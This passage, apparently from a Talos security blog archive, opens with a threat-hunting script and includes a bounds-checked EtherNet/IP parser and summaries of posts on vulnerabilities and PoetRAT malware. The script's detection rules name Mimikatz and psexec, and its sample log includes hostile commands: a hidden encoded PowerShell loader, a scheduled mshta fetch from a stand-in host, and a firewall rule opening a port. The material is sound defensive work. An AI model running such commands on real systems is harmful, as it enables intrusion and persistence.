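    ("T1021.002", "psexec-style execution or admin-share access",
     re.compile(r"psexec|\\\\[\w.-]+\\(?:admin|c)\$", re.I)),
    ("Outlook-COM", "Outlook automation driven from a script host (mail spreader)",
     re.compile(r"(?:powershell|wscript|cscript).*outlook\.application", re.I)),
    ("Mimikatz", "credential dumping module invoked",
     re.compile(r"sekurlsa::|lsadump::", re.I)),
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed record into fields; None for malformed lines."""
    parts = line.strip().split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmdline = parts
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def match_rules(event: Dict[str, str]) -> List[str]:
    """Labels of every rule that fires on this event, in RULES order."""
    text = f"{event['image']} {event['cmdline']}"
    return [label for label, _desc, pat in RULES if pat.search(text)]


def hunt(lines: Iterable[str], min_techniques: int = 2) -> Dict[str, List[str]]:
    """Hosts on which at least min_techniques distinct behaviours were seen.

    A single hit (an admin creating a task, say) is weak evidence; the chain the
    write-up describes stacks several of these on the same machine within minutes.
    """
    seen: Dict[str, set] = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        seen[ev["host"]].update(match_rules(ev))
    return {host: sorted(hits) for host, hits in seen.items() if len(hits) >= min_techniques}


# Constructed sample: WS01 shows the chain, WS02 is ordinary activity.
SAMPLE_LOG = [
    r"2020-08-30T10:01:02|WS01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r'2020-08-30T10:01:05|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\schtasks.exe|schtasks.exe /create /tn Rtsa /tr "mshta http://t.example/a.jsp" /sc minute /mo 30 /f',
    r"2020-08-30T10:01:07|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\netsh.exe|netsh advfirewall firewall add rule name=Update dir=in action=allow protocol=tcp localport=65529",
    r"2020-08-30T10:02:10|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c '$o = New-Object -ComObject Outlook.Application; $f = $o.Session.GetDefaultFolder(10).Items'",
    r"2020-08-30T10:03:00|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\cmd.exe|cmd /c copy C:\Users\Public\m.ps1 \\WS03\admin$\m.ps1",
    r"2020-08-30T10:31:00|WS01|C:\Windows\System32\svchost.exe|C:\Windows\System32\mshta.exe|mshta http://t.example/a.jsp",
    r"2020-08-30T10:05:00|WS02|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
    r"2020-08-30T10:06:00|WS02|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Process",
    "not a record",
]

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(hits)}")
```

The threshold is the point: tune `min_techniques` (and add a time window) to your environment rather than alerting on any single rule, since scheduled tasks and netsh rules are routine in many fleets while the combination with a hidden encoded PowerShell loader and Outlook automation is not.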


Vulnerability Spotlight: Denial-of-service vulnerabilities in Allen-Bradley Flex I/O



Jared Rittle of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

The Allen-Bradley Flex input/output system contains multiple denial-of-service vulnerabilities in its ENIP request path data segment. These bugs exist specifically in the 1794-AENT FLEX I/O modular platform, which provides many I/O operations and serves as a smaller physical device compared to other similar hardware. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious packet to the target device, causing a loss of communication between the victim’s network and the device, resulting in a denial of service.
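The request path in an EtherNet/IP (CIP) request is a sequence of variable-length segments, and data segments carry an attacker-controlled length byte. The parser below is an added example, not Rockwell/Allen-Bradley code and not a reproduction of the reported bugs, whose details the post does not give. It follows the public CIP segment encoding (port, logical and data segments) and shows the check a hardened implementation needs: every declared length is validated against the bytes actually received before anything is read, and a malformed path is rejected instead of being processed. All packets in it are constructed.

```python
"""Bounds-checked parser for a CIP request path (EPATH) from an EtherNet/IP request.

Added example for this spotlight; not vendor code and not the reported flaws.
Segment encodings follow the public CIP specification; all packets are constructed.
"""
from typing import List, Tuple, Union

Segment = Tuple[str, Union[int, bytes, str, Tuple[int, Union[int, bytes]]]]

# Segment type lives in the top three bits of the first byte.
SEG_PORT, SEG_LOGICAL, SEG_DATA = 0x00, 0x20, 0x80
LOGICAL_NAMES = {0x00: "class", 0x04: "instance", 0x08: "member",
                 0x0C: "connection_point", 0x10: "attribute", 0x18: "service"}


class RequestPathError(ValueError):
    """Any malformed path: raised instead of letting the parser read past the buffer."""


def _need(buf: bytes, pos: int, n: int, what: str) -> None:
    """Refuse to read n bytes at pos unless they are really there."""
    if pos + n > len(buf):
        raise RequestPathError(f"{what}: need {n} byte(s) at offset {pos}, only {len(buf) - pos} left")


def parse_request_path(buf: bytes) -> List[Segment]:
    segs: List[Segment] = []
    pos = 0
    while pos < len(buf):
        seg = buf[pos]
        kind = seg & 0xE0
        if kind == SEG_PORT:
            _need(buf, pos, 2, "port segment")
            port = seg & 0x0F
            if seg & 0x10:
                # Extended link address: length byte, address, pad byte to keep word alignment.
                ln = buf[pos + 1]
                _need(buf, pos + 2, ln + (ln & 1), "port segment link address")
                segs.append(("port", (port, buf[pos + 2:pos + 2 + ln])))
                pos += 2 + ln + (ln & 1)
            else:
                segs.append(("port", (port, buf[pos + 1])))
                pos += 2
        elif kind == SEG_LOGICAL:
            name = LOGICAL_NAMES.get(seg & 0x1C)
            fmt = seg & 0x03
            if name is None or fmt == 3:
                raise RequestPathError(f"unsupported logical segment 0x{seg:02x} at offset {pos}")
            if fmt == 0:                      # 8-bit value follows immediately
                _need(buf, pos, 2, name)
                segs.append((name, buf[pos + 1]))
                pos += 2
            else:                             # 16-/32-bit: pad byte, then little-endian value
                width = 2 if fmt == 1 else 4
                _need(buf, pos, 2 + width, name)
                segs.append((name, int.from_bytes(buf[pos + 2:pos + 2 + width], "little")))
                pos += 2 + width
        elif kind == SEG_DATA:
            # The segment class the spotlight names: the length byte is attacker-controlled.
            _need(buf, pos, 2, "data segment header")
            ln = buf[pos + 1]
            if seg == 0x80:                   # simple data segment: length in 16-bit words
                _need(buf, pos + 2, ln * 2, "simple data segment payload")
                segs.append(("data", buf[pos + 2:pos + 2 + ln * 2]))
                pos += 2 + ln * 2
            elif seg == 0x91:                 # ANSI extended symbol: length in bytes, padded to even
                _need(buf, pos + 2, ln + (ln & 1), "ANSI symbol segment payload")
                segs.append(("symbol", buf[pos + 2:pos + 2 + ln].decode("ascii", "replace")))
                pos += 2 + ln + (ln & 1)
            else:
                raise RequestPathError(f"unsupported data segment 0x{seg:02x} at offset {pos}")
        else:
            raise RequestPathError(f"unsupported segment type 0x{seg:02x} at offset {pos}")
    return segs


def check_path(buf: bytes) -> Tuple[bool, str]:
    """Accept/reject helper: a device should drop the request on False, not process it."""
    try:
        return True, ", ".join(f"{k}={v!r}" for k, v in parse_request_path(buf))
    except RequestPathError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed packets: a normal class/instance path, a symbolic path, and two
    # with a data-segment length that exceeds what was actually received.
    for hexpath in ("20022401", "9104546167312801", "91ff4142", "8010"):
        print(hexpath, "->", check_path(bytes.fromhex(hexpath)))
```

The two rejected inputs are the shape of the problem: a single length byte can claim up to 255 bytes (or 510 bytes for a simple data segment) regardless of how short the packet is, so the check has to happen before the slice, and a parser that only checks the header bytes will read past the end of the received frame.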

In accordance with our coordinated disclosure policy, Cisco Talos worked with Allen-Bradley to ensure that these issues are resolved and that an update is available for affected customers.

Friday, October 9, 2020

Threat Roundup for October 2 to October 9


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 2 and Oct. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, October 8, 2020

Threat Source newsletter for Oct. 8, 2020

 

Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

We’ve been writing and talking about election security a ton lately. And as the U.S. presidential election draws closer, we decided it was time to summarize some things. So, we released this blog post with our formal recommendations for voters and how they can avoid disinformation and other bad actors trying to influence the election. 

Our researchers are also following the development of the PoetRAT malware. This remote access trojan is still targeting public and private entities in Azerbaijan, and we’ve seen the actor behind the threat make several tweaks over time to make it more agile and difficult to detect. 

If vulnerability research is more your thing, we also have a deep dive into our work discovering bugs in Microsoft Azure Sphere as part of a challenge from Microsoft. In all, we disclosed 16 vulnerabilities. Here’s what you need to know about them and how to stay protected. 

Wednesday, October 7, 2020

Vulnerability Spotlight: DoS vulnerability in ATIKMDAG.SYS AMD graphics driver

 

Piotr Bania of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a denial-of-service vulnerability in the ATIKMDAG.SYS driver for some AMD graphics cards. An attacker could send the victim a specially crafted D3DKMTCreateAllocation API request to cause an out-of-bounds read, leading to a denial-of-service condition. This vulnerability could be triggered from a guest account.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to disclose this vulnerability. AMD has disclosed this vulnerability and released notes on it but does not plan to have an official patch until Q1 of 2021.

What to expect when you’re electing: Voter recommendations



By Amy Henderson. 

Information operations have been around for millennia, yet with the advent of the internet and the democratization of content creation, the barriers to entry have lowered to a point that anyone can play now.   

In the course of our latest research on disinformation, with an eye toward election security, we have covered the what, how and why of disinformation campaigns, state and non-state actors that engage in this behavior, as well as the psychological effect on society.  To finalize this research, we want to ensure that we leave our audience with actionable guidance on how they can counteract disinformation, stop the spread and educate themselves.  

Tuesday, October 6, 2020

90 days, 16 bugs, and an Azure Sphere Challenge




Cisco Talos reports 16 vulnerabilities in Microsoft Azure Sphere's sponsored research challenge.


By Claudio Bozzato, Lilith [-_-]; and Dave McDaniel. 


On May 15, 2020, Microsoft kicked off the Azure Sphere Security Research Challenge, a three-month initiative aimed at finding bugs in Azure Sphere. Among the teams and individuals selected, Cisco Talos conducted a three-month sprint of research into the platform and reported 16 vulnerabilities of various severity, including a privilege escalation bug chain to acquire Azure Sphere Capabilities, the most valuable Linux normal-world permissions in the Azure Sphere context. 

The Azure Sphere platform is a cloud-connected and custom SoC platform designed specifically for IoT application security. Internally, the SoC is made up of a set of several ARM cores that have different roles (e.g. running different types of applications, enforcing security, and managing encryption). Externally, the Azure Sphere platform is supported by Microsoft’s Azure Cloud, which handles secure updates, app deployment, and periodic verification of device integrity to determine if Azure Cloud access should be allowed or not. Note however, that while the Azure Sphere is updated and deploys through the Azure Cloud, customers can still interact with their own servers independently.

PoetRAT: Malware targeting public and private sector in Azerbaijan evolves



By Warren Mercer, Paul Rascagneres and Vitor Ventura.

  • The Azerbaijan public sector and other important organizations are still targeted by new versions of PoetRAT.
  • This actor leverages malicious Microsoft Word documents purporting to be from the Azerbaijan government.
  • The attacker has moved from Python to Lua script.
  • The attacker improves their operational security (OpSec) by changing protocols and performing reconnaissance on compromised systems.

Executive summary


Cisco Talos discovered PoetRAT earlier this year. We have continued to monitor this actor and their behavior over the preceding months. We have observed multiple new campaigns indicating a change in the actor's capabilities and showing their maturity toward better operational security. We assess with medium confidence that this actor continues to use spear-phishing attacks to lure a user into downloading a malicious document from temporary hosting providers. We currently believe the malware comes from malicious URLs included in the email, resulting in the user clicking and downloading a malicious document. These Word documents continue to contain malicious macros, which in turn download additional payloads once the attacker sets their sights on a particular victim. Previous versions of PoetRAT deployed a Python interpreter to execute the included source code, which resulted in a much larger file size compared to the latest version's switch to Lua script. As geopolitical tensions grow between Azerbaijan and its neighbouring countries, this is no doubt an espionage campaign with national security implications, deployed by a malicious actor with a specific interest in various Azerbaijani government departments.